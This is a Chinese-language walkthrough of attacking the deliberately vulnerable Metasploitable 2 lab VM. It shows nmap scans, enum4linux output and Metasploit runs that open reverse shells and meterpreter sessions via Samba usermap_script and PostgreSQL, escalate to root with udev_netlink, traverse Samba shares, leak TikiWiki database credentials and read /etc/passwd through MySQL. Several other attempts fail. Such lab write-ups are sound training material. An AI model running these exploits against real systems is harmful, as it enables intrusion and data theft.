# 环境配置

下载下来之后网 VM 里一放,默认开了桥接模式,直接用

账号 / 密码:msfadmin/msfadmin

登录进去 ifconfig 看一眼 IP: 192.168.74.128

准备开干

# 服务识别

C:\WINDOWS\system32>nmap 192.168.74.128 -sS -T4 -p-
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-02 20:22 中国标准时间
Nmap scan report for 192.168.74.128
Host is up (0.00035s latency).
Not shown: 65522 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3306/tcp open  mysql
3632/tcp open  distccd
5432/tcp open  postgresql
8009/tcp open  ajp13
8180/tcp open  unknown
MAC Address: 00:0C:29:BA:A0:B5 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 6.81 seconds

看到开了 80 端口,瞄一眼,啥也没有。

开了 80 肯定尝试从 80 先去手工看看,当练手了。其实如果是正常情况我可能就直接上综合扫描了

dirsearch 扫一下路径瞅瞅

D:\PentestTool\Pentest_ToolBox\Gather_Infomation\dirsearch>dirsearch -u http://192.168.74.128
dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: D:\PentestTool\Pentest_ToolBox\Gather_Infomation\dirsearch\reports\http_192.168.74.128\_24-04-01_20-13-18.txt

Target: http://192.168.74.128/

[20:13:18] Starting:
[20:13:23] 403 -  332B  - /.ht_wsr.txt
[20:13:24] 403 -  335B  - /.htaccess.bak1
[20:13:24] 403 -  335B  - /.htaccess.orig
[20:13:24] 403 -  335B  - /.htaccess.save
[20:13:24] 403 -  337B  - /.htaccess.sample
[20:13:24] 403 -  336B  - /.htaccess_extra
[20:13:24] 403 -  333B  - /.htaccessBAK
[20:13:24] 403 -  335B  - /.htaccess_orig
[20:13:24] 403 -  334B  - /.htaccessOLD2
[20:13:24] 403 -  333B  - /.htaccess_sc
[20:13:24] 403 -  333B  - /.htaccessOLD
[20:13:24] 403 -  325B  - /.htm
[20:13:24] 403 -  331B  - /.htpasswds
[20:13:24] 403 -  335B  - /.htpasswd_test
[20:13:24] 403 -  332B  - /.httr-oauth
[20:13:24] 403 -  326B  - /.html
[20:14:12] 403 -  329B  - /cgi-bin/
[20:14:26] 403 -  325B  - /doc/
[20:14:26] 403 -  329B  - /doc/api/
[20:14:27] 403 -  340B  - /doc/en/changes.html
[20:14:27] 403 -  340B  - /doc/html/index.html
[20:14:27] 403 -  339B  - /doc/stable.version
[20:15:16] 200 -   48KB - /phpinfo
[20:15:16] 200 -   48KB - /phpinfo.php
[20:15:37] 403 -  334B  - /server-status
[20:15:37] 403 -  335B  - /server-status/
[20:15:59] 301 -  357B  - /tikiwiki  ->  http://192.168.74.128/tikiwiki/

看到有一个 phpinfo,还有一个新的页面,叫 tikiwiki

# 漏洞利用

# tikiwiki RCE

由于这个是 metasploit 的靶场,看到这个 tikiwiki ,我特么直接搜索对应的 exp

msf6 > search tikiwiki

Matching Modules
================

   #  Name                                             Disclosure Date  Rank       Check  Description
   -  ----                                             ---------------  ----       -----  -----------
   0  exploit/unix/webapp/php_xmlrpc_eval              2005-06-29       excellent  Yes    PHP XML-RPC Arbitrary Code Execution
   1  exploit/unix/webapp/tikiwiki_upload_exec         2016-07-11       excellent  Yes    Tiki Wiki Unauthenticated File Upload Vulnerability
   2  exploit/unix/webapp/tikiwiki_unserialize_exec    2012-07-04       excellent  No     Tiki Wiki unserialize() PHP Code Execution
   3  auxiliary/admin/tikiwiki/tikidblib               2006-11-01       normal     No     TikiWiki Information Disclosure
   4  exploit/unix/webapp/tikiwiki_jhot_exec           2006-09-02       excellent  Yes    TikiWiki jhot Remote Command Execution
   5  exploit/unix/webapp/tikiwiki_graph_formula_exec  2007-10-10       excellent  Yes    TikiWiki tiki-graph_formula Remote PHP Code Execution


Interact with a module by name or index. For example info 5, use 5 or use exploit/unix/webapp/tikiwiki_graph_formula_exec

看到了 4 个 RCE,一个文件上传,一个信息披露,待会挨个模块 info 瞅瞅

随便调用一个 RCE 看看

5 个针对 tikiwiki 的模块全部失败,有的是不支持 payload, fomula 这个讲道理应该可以,但是不知道为什么不行,可能是我的虚拟机配置有问题?不应该啊,等会复盘

查了些资料,作者在其他的相关问题下面曾留言说,可能是由于漏洞的坏字符和编码器的问题,编码器没有办法在保证预期功能的情况下完美解决坏字符问题,所以建议尝试其他的 payload。但是在其他人的文章中发现,是成功利用了这个漏洞的,可能是我用是 metasploit 的 V6 最新版本,他们可能调整了编码器,所以导致有些老模块没有做相应的适配导致这个问题。(我猜的

# samba

不过他还开了 139445 端口,看一眼具体的版本信息

C:\WINDOWS\system32>nmap -sV 192.168.74.128 -p 445
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-02 15:32 中国标准时间
Nmap scan report for 192.168.209.68
Host is up (0.00088s latency).

PORT    STATE SERVICE     VERSION
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 00:0C:29:BA:A0:B5 (VMware)

看到了版本信息,如果 samba 服务具体版本信息在 3.0.203.0.25rc3 的话可以使用 CVE-2007-2447 进行工具

samba 的模块搞一下

msf6 exploit(unix/webapp/tikiwiki_graph_formula_exec) > use exploit/multi/samba/usermap_script
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.74.128
RHOSTS => 192.168.74.128
msf6 exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP handler on 192.168.2.225:4444
[*] Command shell session 2 opened (192.168.2.225:4444 -> 192.168.74.128:59869) at 2024-04-01 20:58:55 +0800

id
uid=0(root) gid=0(root)

成功拿到了 root 权限

# tikiwiki 数据库泄露

之前利用的漏洞因为版本问题无法利用。我懒得下 V4 版本的 msf,所以尝试其他模块进行

尝试了 db 泄露的模块

msf6 auxiliary(admin/tikiwiki/tikidblib) > run
[*] Running module against 192.168.209.68

[*] Establishing a connection to the target...
[*] Get information about database...
[*] Install path : /var/www/tikiwiki/lib/tikidblib.php
[*] DB type      : mysql
[*] DB name      : tikiwiki195
[*] DB host      : localhost
[*] DB user      : root
[*] DB password  : root
[*] Auxiliary module execution completed

看到了数据库的账号和密码,直接连接进去,可以查看系统文件

mysql -h 192.168.1.105 -u root -p
root
show databases;
use mysql
show tables;
select User, Password, from user;
select load_file('/etc/passwd');

# postgresql 利用

看到开放了 5432 端口,查一下版本信息

C:\WINDOWS\system32>nmap -sV 192.168.74.128 -p 5432
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-02 16:30 中国标准时间
Nmap scan report for bogon (192.168.74.128)
Host is up (0.00013s latency).

PORT     STATE SERVICE    VERSION
5432/tcp open  postgresql PostgreSQL DB 8.3.0 - 8.3.7
MAC Address: 00:0C:29:BA:A0:B5 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.37 seconds

查询一下 metasploit 中的利用模块

msf6 > search name:postgresql version:8

Matching Modules
================

   #  Name                                                        Disclosure Date  Rank       Check  Description
   -  ----                                                        ---------------  ----       -----  -----------
   0  auxiliary/server/capture/postgresql                                          normal     No     Authentication Capture: PostgreSQL
   1  exploit/multi/postgres/postgres_copy_from_program_cmd_exec  2019-03-20       excellent  Yes    PostgreSQL COPY FROM PROGRAM Command Execution
   2  exploit/multi/postgres/postgres_createlang                  2016-01-01       good       Yes    PostgreSQL CREATE LANGUAGE Execution
   3  auxiliary/scanner/postgres/postgres_dbname_flag_injection                    normal     No     PostgreSQL Database Name Command Line Flag Injection
   4  auxiliary/scanner/postgres/postgres_login                                    normal     No     PostgreSQL Login Utility
   5  auxiliary/admin/postgres/postgres_readfile                                   normal     No     PostgreSQL Server Generic Query
   6  auxiliary/admin/postgres/postgres_sql                                        normal     No     PostgreSQL Server Generic Query
   7  auxiliary/scanner/postgres/postgres_version                                  normal     No     PostgreSQL Version Probe
   8  exploit/linux/postgres/postgres_payload                     2007-06-05       excellent  Yes    PostgreSQL for Linux Payload Execution
   9  exploit/windows/postgres/postgres_payload                   2009-04-10       excellent  Yes    PostgreSQL for Microsoft Windows Payload Execution


Interact with a module by name or index. For example info 9, use 9 or use exploit/windows/postgres/postgres_payload

第八个可以直接 getshell,开冲

msf6 exploit(linux/postgres/postgres_payload) > use 8
[*] Using configured payload linux/x86/meterpreter/reverse_tcp

# 配置省略

msf6 exploit(linux/postgres/postgres_payload) > run

[*] Started reverse TCP handler on 192.168.74.1:4444
[*] 192.168.74.128:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
[*] Uploaded as /tmp/ViEXhZas.so, should be cleaned up automatically
[*] Sending stage (1017704 bytes) to 192.168.74.128
[*] Meterpreter session 2 opened (192.168.74.1:4444 -> 192.168.74.128:51664) at 2024-04-02 16:36:20 +0800

meterpreter >

拿到了 meterpreter

查询一下权限

meterpreter > getuid
Server username: postgres

发现是低权限,那么开始提权

查找资料发现这个版本的内核具有提权漏洞 Linux udev Netlink Local Privilege Escalation

进行利用

meterpreter > bg
[*] Backgrounding session 2...
msf6 exploit(linux/postgres/postgres_payload) > use exploit/linux/local/udev_netlink
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/local/udev_netlink) > set LHOST 192.168.74.1
LHOST => 192.168.74.1
msf6 exploit(linux/local/udev_netlink) > set SESSION 2
SESSION => 2
msf6 exploit(linux/local/udev_netlink) > run

[*] Started reverse TCP handler on 192.168.74.1:4444
[*] Attempting to autodetect netlink pid...
[*] Meterpreter session, using get_processes to find netlink pid
[*] udev pid: 2994
[+] Found netlink pid: 2993
[*] Writing payload executable (207 bytes) to /tmp/cTXcvwGutp
[*] Writing exploit executable (1879 bytes) to /tmp/DaZonJcalG
[*] chmod'ing and running it...
[*] Sending stage (1017704 bytes) to 192.168.74.128
[*] Meterpreter session 3 opened (192.168.74.1:4444 -> 192.168.74.128:42669) at 2024-04-02 16:40:14 +0800

meterpreter > getuid
Server username: root

拿到了权限

# SMB 枚举和目录穿越

这个版本的 samba 还有一个漏洞 Samba Symlink Directory Traversal ,是个目录遍历

用 kali 里的 enum4linux 工具可以遍历 smb 服务中的信息,默认全部攻击,所以信息很多。包括了用户名、共享文件夹信息等等等等

┌──(root㉿kali)-[~/Desktop]
└─# enum4linux 192.168.74.128
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Apr  2 08:07:18 2024

 =========================================( Target Information )=========================================

Target ........... 192.168.74.128
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===========================( Enumerating Workgroup/Domain on 192.168.74.128 )===========================


[+] Got domain/workgroup name: WORKGROUP


 ===============================( Nbtstat Information for 192.168.74.128 )===============================

Looking up status of 192.168.74.128
        METASPLOITABLE  <00> -         B <ACTIVE>  Workstation Service
        METASPLOITABLE  <03> -         B <ACTIVE>  Messenger Service
        METASPLOITABLE  <20> -         B <ACTIVE>  File Server Service
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

        MAC Address = 00-00-00-00-00-00

 ==================================( Session Check on 192.168.74.128 )==================================


[+] Server 192.168.74.128 allows sessions using username '', password ''


 ===============================( Getting domain SID for 192.168.74.128 )===============================

Domain Name: WORKGROUP
Domain Sid: (NULL SID)

[+] Can't determine if host is part of domain or part of a workgroup


 ==================================( OS information on 192.168.74.128 )==================================


[E] Can't get OS info with smbclient

                                                                                                                                                                                                                   
[+] Got OS info for 192.168.74.128 from srvinfo:                                                                                                                                                                   
        METASPLOITABLE Wk Sv PrQ Unx NT SNT metasploitable server (Samba 3.0.20-Debian)                                                                                                                            
        platform_id     :       500
        os version      :       4.9
        server type     :       0x9a03


 ======================================( Users on 192.168.74.128 )======================================
                                                                                                                                                                                                                   
index: 0x1 RID: 0x3f2 acb: 0x00000011 Account: games    Name: games     Desc: (null)                                                                                                                               
index: 0x2 RID: 0x1f5 acb: 0x00000011 Account: nobody   Name: nobody    Desc: (null)
index: 0x3 RID: 0x4ba acb: 0x00000011 Account: bind     Name: (null)    Desc: (null)
index: 0x4 RID: 0x402 acb: 0x00000011 Account: proxy    Name: proxy     Desc: (null)
index: 0x5 RID: 0x4b4 acb: 0x00000011 Account: syslog   Name: (null)    Desc: (null)
index: 0x6 RID: 0xbba acb: 0x00000010 Account: user     Name: just a user,111,, Desc: (null)
index: 0x7 RID: 0x42a acb: 0x00000011 Account: www-data Name: www-data  Desc: (null)
index: 0x8 RID: 0x3e8 acb: 0x00000011 Account: root     Name: root      Desc: (null)
index: 0x9 RID: 0x3fa acb: 0x00000011 Account: news     Name: news      Desc: (null)
index: 0xa RID: 0x4c0 acb: 0x00000011 Account: postgres Name: PostgreSQL administrator,,,       Desc: (null)
index: 0xb RID: 0x3ec acb: 0x00000011 Account: bin      Name: bin       Desc: (null)
index: 0xc RID: 0x3f8 acb: 0x00000011 Account: mail     Name: mail      Desc: (null)
index: 0xd RID: 0x4c6 acb: 0x00000011 Account: distccd  Name: (null)    Desc: (null)
index: 0xe RID: 0x4ca acb: 0x00000011 Account: proftpd  Name: (null)    Desc: (null)
index: 0xf RID: 0x4b2 acb: 0x00000011 Account: dhcp     Name: (null)    Desc: (null)
index: 0x10 RID: 0x3ea acb: 0x00000011 Account: daemon  Name: daemon    Desc: (null)
index: 0x11 RID: 0x4b8 acb: 0x00000011 Account: sshd    Name: (null)    Desc: (null)
index: 0x12 RID: 0x3f4 acb: 0x00000011 Account: man     Name: man       Desc: (null)
index: 0x13 RID: 0x3f6 acb: 0x00000011 Account: lp      Name: lp        Desc: (null)
index: 0x14 RID: 0x4c2 acb: 0x00000011 Account: mysql   Name: MySQL Server,,,   Desc: (null)
index: 0x15 RID: 0x43a acb: 0x00000011 Account: gnats   Name: Gnats Bug-Reporting System (admin)        Desc: (null)
index: 0x16 RID: 0x4b0 acb: 0x00000011 Account: libuuid Name: (null)    Desc: (null)
index: 0x17 RID: 0x42c acb: 0x00000011 Account: backup  Name: backup    Desc: (null)
index: 0x18 RID: 0xbb8 acb: 0x00000010 Account: msfadmin        Name: msfadmin,,,       Desc: (null)
index: 0x19 RID: 0x4c8 acb: 0x00000011 Account: telnetd Name: (null)    Desc: (null)
index: 0x1a RID: 0x3ee acb: 0x00000011 Account: sys     Name: sys       Desc: (null)
index: 0x1b RID: 0x4b6 acb: 0x00000011 Account: klog    Name: (null)    Desc: (null)
index: 0x1c RID: 0x4bc acb: 0x00000011 Account: postfix Name: (null)    Desc: (null)
index: 0x1d RID: 0xbbc acb: 0x00000011 Account: service Name: ,,,       Desc: (null)
index: 0x1e RID: 0x434 acb: 0x00000011 Account: list    Name: Mailing List Manager      Desc: (null)
index: 0x1f RID: 0x436 acb: 0x00000011 Account: irc     Name: ircd      Desc: (null)
index: 0x20 RID: 0x4be acb: 0x00000011 Account: ftp     Name: (null)    Desc: (null)
index: 0x21 RID: 0x4c4 acb: 0x00000011 Account: tomcat55        Name: (null)    Desc: (null)
index: 0x22 RID: 0x3f0 acb: 0x00000011 Account: sync    Name: sync      Desc: (null)
index: 0x23 RID: 0x3fc acb: 0x00000011 Account: uucp    Name: uucp      Desc: (null)

user:[games] rid:[0x3f2]
user:[nobody] rid:[0x1f5]
user:[bind] rid:[0x4ba]
user:[proxy] rid:[0x402]
user:[syslog] rid:[0x4b4]
user:[user] rid:[0xbba]
user:[www-data] rid:[0x42a]
user:[root] rid:[0x3e8]
user:[news] rid:[0x3fa]
user:[postgres] rid:[0x4c0]
user:[bin] rid:[0x3ec]
user:[mail] rid:[0x3f8]
user:[distccd] rid:[0x4c6]
user:[proftpd] rid:[0x4ca]
user:[dhcp] rid:[0x4b2]
user:[daemon] rid:[0x3ea]
user:[sshd] rid:[0x4b8]
user:[man] rid:[0x3f4]
user:[lp] rid:[0x3f6]
user:[mysql] rid:[0x4c2]
user:[gnats] rid:[0x43a]
user:[libuuid] rid:[0x4b0]
user:[backup] rid:[0x42c]
user:[msfadmin] rid:[0xbb8]
user:[telnetd] rid:[0x4c8]
user:[sys] rid:[0x3ee]
user:[klog] rid:[0x4b6]
user:[postfix] rid:[0x4bc]
user:[service] rid:[0xbbc]
user:[list] rid:[0x434]
user:[irc] rid:[0x436]
user:[ftp] rid:[0x4be]
user:[tomcat55] rid:[0x4c4]
user:[sync] rid:[0x3f0]
user:[uucp] rid:[0x3fc]

 ================================( Share Enumeration on 192.168.74.128 )================================
                                                                                                                                                                                                                   
                                                                                                                                                                                                                   
        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        tmp             Disk      oh noes!
        opt             Disk      
        IPC$            IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
        ADMIN$          IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            METASPLOITABLE

[+] Attempting to map shares on 192.168.74.128                                                                                                                                                                     
                                                                                                                                                                                                                   
//192.168.74.128/print$ Mapping: DENIED Listing: N/A Writing: N/A                                                                                                                                                  
//192.168.74.128/tmp    Mapping: OK Listing: OK Writing: N/A
//192.168.74.128/opt    Mapping: DENIED Listing: N/A Writing: N/A

[E] Can't understand response:                                                                                                                                                                                     
                                                                                                                                                                                                                   
NT_STATUS_NETWORK_ACCESS_DENIED listing \*                                                                                                                                                                         
//192.168.74.128/IPC$   Mapping: N/A Listing: N/A Writing: N/A
//192.168.74.128/ADMIN$ Mapping: DENIED Listing: N/A Writing: N/A

 ===========================( Password Policy Information for 192.168.74.128 )===========================
                                                                                                                                                                                                                   
                                                                                                                                                                                                                   

[+] Attaching to 192.168.74.128 using a NULL share

[+] Trying protocol 139/SMB...

[+] Found domain(s):

        [+] METASPLOITABLE
        [+] Builtin

[+] Password Info for Domain: METASPLOITABLE

        [+] Minimum password length: 5
        [+] Password history length: None
        [+] Maximum password age: Not Set
        [+] Password Complexity Flags: 000000

                [+] Domain Refuse Password Change: 0
                [+] Domain Password Store Cleartext: 0
                [+] Domain Password Lockout Admins: 0
                [+] Domain Password No Clear Change: 0
                [+] Domain Password No Anon Change: 0
                [+] Domain Password Complex: 0

        [+] Minimum password age: None
        [+] Reset Account Lockout Counter: 30 minutes 
        [+] Locked Account Duration: 30 minutes 
        [+] Account Lockout Threshold: None
        [+] Forced Log off Time: Not Set



[+] Retieved partial password policy with rpcclient:                                                                                                                                                               
                                                                                                                                                                                                                   
                                                                                                                                                                                                                   
Password Complexity: Disabled                                                                                                                                                                                      
Minimum Password Length: 0


 ======================================( Groups on 192.168.74.128 )======================================
                                                                                                                                                                                                                   
                                                                                                                                                                                                                   
[+] Getting builtin groups:                                                                                                                                                                                        
                                                                                                                                                                                                                   
                                                                                                                                                                                                                   
[+]  Getting builtin group memberships:                                                                                                                                                                            
                                                                                                                                                                                                                   
                                                                                                                                                                                                                   
[+]  Getting local groups:                                                                                                                                                                                         
                                                                                                                                                                                                                   
                                                                                                                                                                                                                   
[+]  Getting local group memberships:                                                                                                                                                                              
                                                                                                                                                                                                                   
                                                                                                                                                                                                                   
[+]  Getting domain groups:                                                                                                                                                                                        
                                                                                                                                                                                                                   
                                                                                                                                                                                                                   
[+]  Getting domain group memberships:                                                                                                                                                                             
                                                                                                                                                                                                                   
                                                                                                                                                                                                                   
 =================( Users on 192.168.74.128 via RID cycling (RIDS: 500-550,1000-1050) )=================
                                                                                                                                                                                                                   
                                                                                                                                                                                                                   
[I] Found new SID:                                                                                                                                                                                                 
S-1-5-21-1042354039-2475377354-766472396                                                                                                                                                                           

[+] Enumerating users using SID S-1-5-21-1042354039-2475377354-766472396 and logon username '', password ''                                                                                                        
                                                                                                                                                                                                                   
S-1-5-21-1042354039-2475377354-766472396-500 METASPLOITABLE\Administrator (Local User)                                                                                                                             
S-1-5-21-1042354039-2475377354-766472396-501 METASPLOITABLE\nobody (Local User)
S-1-5-21-1042354039-2475377354-766472396-512 METASPLOITABLE\Domain Admins (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-513 METASPLOITABLE\Domain Users (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-514 METASPLOITABLE\Domain Guests (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1000 METASPLOITABLE\root (Local User)
S-1-5-21-1042354039-2475377354-766472396-1001 METASPLOITABLE\root (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1002 METASPLOITABLE\daemon (Local User)
S-1-5-21-1042354039-2475377354-766472396-1003 METASPLOITABLE\daemon (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1004 METASPLOITABLE\bin (Local User)
S-1-5-21-1042354039-2475377354-766472396-1005 METASPLOITABLE\bin (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1006 METASPLOITABLE\sys (Local User)
S-1-5-21-1042354039-2475377354-766472396-1007 METASPLOITABLE\sys (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1008 METASPLOITABLE\sync (Local User)
S-1-5-21-1042354039-2475377354-766472396-1009 METASPLOITABLE\adm (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1010 METASPLOITABLE\games (Local User)
S-1-5-21-1042354039-2475377354-766472396-1011 METASPLOITABLE\tty (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1012 METASPLOITABLE\man (Local User)
S-1-5-21-1042354039-2475377354-766472396-1013 METASPLOITABLE\disk (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1014 METASPLOITABLE\lp (Local User)
S-1-5-21-1042354039-2475377354-766472396-1015 METASPLOITABLE\lp (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1016 METASPLOITABLE\mail (Local User)
S-1-5-21-1042354039-2475377354-766472396-1017 METASPLOITABLE\mail (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1018 METASPLOITABLE\news (Local User)
S-1-5-21-1042354039-2475377354-766472396-1019 METASPLOITABLE\news (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1020 METASPLOITABLE\uucp (Local User)
S-1-5-21-1042354039-2475377354-766472396-1021 METASPLOITABLE\uucp (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1025 METASPLOITABLE\man (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1026 METASPLOITABLE\proxy (Local User)
S-1-5-21-1042354039-2475377354-766472396-1027 METASPLOITABLE\proxy (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1031 METASPLOITABLE\kmem (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1041 METASPLOITABLE\dialout (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1043 METASPLOITABLE\fax (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1045 METASPLOITABLE\voice (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1049 METASPLOITABLE\cdrom (Domain Group)

 ==============================( Getting printer info for 192.168.74.128 )==============================
                                                                                                                                                                                                                   
No printers returned.                                                                                                                                                                                              


enum4linux complete on Tue Apr  2 08:07:28 2024

同样的 metasploit 也可以做到

msf6 > search samba_symlink

Matching Modules
================

   #  Name                                         Disclosure Date  Rank    Check  Description
   -  ----                                         ---------------  ----    -----  -----------
   0  auxiliary/admin/smb/samba_symlink_traversal                   normal  No     Samba Symlink Directory Traversal


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/admin/smb/samba_symlink_traversal

msf6 > use 0
msf6 auxiliary(admin/smb/samba_symlink_traversal) > set RHOSTS 192.168.74.128
RHOSTS => 192.168.74.128
msf6 auxiliary(admin/smb/samba_symlink_traversal) > set SMBSHARE tmp
SMBSHARE => tmp
msf6 auxiliary(admin/smb/samba_symlink_traversal) > run
[*] Running module against 192.168.74.128

[*] 192.168.74.128:445 - Connecting to the server...
[*] 192.168.74.128:445 - Trying to mount writeable share 'tmp'...
[*] 192.168.74.128:445 - Trying to link 'rootfs' to the root filesystem...
[*] 192.168.74.128:445 - Now access the following share to browse the root filesystem:
[*] 192.168.74.128:445 -        \\192.168.74.128\tmp\rootfs\

[*] Auxiliary module execution completed

这样就可以遍历目录了,使用 smb 连上去访问 \rootfs\ 就相当于访问根目录,可以尝试写入 ssh

# distcc 命令执行

看到了开启了 3632distcc 服务,查一下具体版本信息

C:\WINDOWS\system32>nmap -p 3632 -sV 192.168.74.128
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-02 20:24 中国标准时间
Nmap scan report for 192.168.74.128
Host is up (0.00s latency).

PORT     STATE SERVICE VERSION
3632/tcp open  distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
MAC Address: 00:0C:29:BA:A0:B5 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.06 seconds

查一下攻击模块


msf6 auxiliary(admin/smb/samba_symlink_traversal) > search name:distcc

Matching Modules
================

   #  Name                           Disclosure Date  Rank       Check  Description
   -  ----                           ---------------  ----       -----  -----------
   0  exploit/unix/misc/distcc_exec  2002-02-01       excellent  Yes    DistCC Daemon Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/misc/distcc_exec

使用并利用,但是攻击失败

msf6 exploit(unix/misc/distcc_exec) > run

[*] Started reverse TCP handler on 192.168.74.1:7777
[-] 192.168.74.128:3632 - Exploit failed: Errno::ECONNRESET An existing connection was forcibly closed by the remote host.
[*] Exploit completed, but no session was created.

这个问题搜了半天,没有靠谱的答案。知道的大哥踢我

# Tomcat

8180 端口没发现是什么东西,探测一下

C:\WINDOWS\system32>nmap -sV 192.168.74.128 -p 8180
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-02 20:40 中国标准时间
Nmap scan report for 192.168.74.128
Host is up (0.00s latency).

PORT     STATE SERVICE VERSION
8180/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:BA:A0:B5 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.15 seconds

老生常谈,通过破解口令,进行 war 包拿 shell。

metasploit 代劳了

msf6 exploit(multi/http/tomcat_mgr_deploy) > run

[*] Started reverse TCP handler on 192.168.74.1:4444
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 6117 bytes as g8EZVHSRE.war ...
[*] Executing /g8EZVHSRE/ZgXpG0r8NWYiewAWxe0R7H69CsMyfi.jsp...
[-] Execution failed on g8EZVHSRE [500 Internal Server Error]
[*] Undeploying g8EZVHSRE ...
[*] Exploit completed, but no session was created.

metasploit 代劳不了了,很奇怪的上传失败,看了下 tomcat 管理端,文件是传上去了,但是好像不能执行?不明白原因,同样的步骤别人是 OK 的啊?

我直接打 war 包 jsp 的马,也不行

D:\Desktop\1111>jar -cvf 222.war .\
已添加清单
正在添加: 111.jsp(输入 = 855) (输出 = 494)(压缩了 42%)

奇怪耶

# 弱口令

其他的都是些弱口令了,整个 hydra 爆破完事。

# 小结

tomcat 上传 war 包、tikiwiki 的 RCE 和 distcc 的 RCE 都失败了

tikiwiki 可能是因为 metasploit 高版本改写了编码器导致老模块不兼容

tomcat 不知道为什么

distcc 网上搜的最多的都说是 ssl 的问题,但是有这个问题的人都试过了,解决不了

有知道的大哥踢我

参考:

  • https://stuffwithaurum.com/2015/06/13/metasploitable-walkthrough-an-exploitation-guide/